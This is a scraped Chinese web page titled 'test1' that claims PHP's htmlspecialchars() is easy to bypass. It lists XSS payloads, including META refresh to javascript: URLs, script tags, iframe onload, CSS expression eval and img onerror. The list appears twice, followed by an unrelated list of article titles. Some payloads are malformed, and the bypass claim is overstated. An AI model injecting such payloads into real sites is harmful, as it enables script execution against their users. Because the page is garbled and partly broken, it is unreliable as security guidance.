test1
来源:互联网 发布:湖南软件企业评估 编辑:程序博客网 时间:2024/06/10 18:01
事实上绕过htmlspecialchars()的过滤是非常简单的,这里有一些绕过过滤的方法:
<META HTTP-EQUIV=/"refresh/" CONTENT=/"0;
URL=http://;URL=javascript:alert('XSS');/">
<META HTTP-EQUIV=/"refresh/"
CONTENT=/"0;url=javascript:alert('XSS');/">
'">><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
'>><marquee><h1>XSS</h1></marquee>
"><script alert(String.fromCharCode(88,83,83))</script>
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
<div
style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCo
de(88,83,83));'))">
window.alert("Xyli !");
"/></a></><img src=1.gif onerror=alert(1)>
[color=red']mouse over
<body
<body>
click me
<script language="JavaScript">alert('XSS')</script>
<img src="javascript:alert('XSS')">
'); alert('XSS
<META HTTP-EQUIV=/"refresh/" CONTENT=/"0;
URL=http://;URL=javascript:alert('XSS');/">
<META HTTP-EQUIV=/"refresh/"
CONTENT=/"0;url=javascript:alert('XSS');/">
'">><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
'>><marquee><h1>XSS</h1></marquee>
"><script alert(String.fromCharCode(88,83,83))</script>
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
<div
style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCo
de(88,83,83));'))">
window.alert("Xyli !");
"/></a></><img src=1.gif onerror=alert(1)>
[color=red']mouse over
<body
<body>
click me
<script language="JavaScript">alert('XSS')</script>
<img src="javascript:alert('XSS')">
'); alert('XSS
0 0
- test1
- test1
- test1
- test1
- test1
- test1
- TEST1
- test1
- test1
- TEST1
- Test1
- test1
- Test1
- Test1
- Test1
- test1
- test1
- test1
- Unrecognized Windows Sockets error: 0: JVM_Bind 异常解决办法
- ATM自动取款机
- 寂寞人生的家庭日天津的金融
- Container With Most Water --装最多水的容器(重)
- Myeclipse 2013 professional破解
- test1
- delphi中如何判断打印机是否安装
- 虚拟化技术(应用程序虚拟化)(读书笔记)
- 记录《C/C++100个典型的Bugs》网址
- HDOJ 猜数字(java)
- mysql Last packet sent to the server was 0 ms ago.
- 用游标删除符合条件的表 可以清空该数据库下所有表
- 解决ubuntu下面putty不能连接RS232串口(USB2COM线)
- 项目构建之maven篇:8.maven发布web工程及基于spring mvc,jetty实现的用户管理demo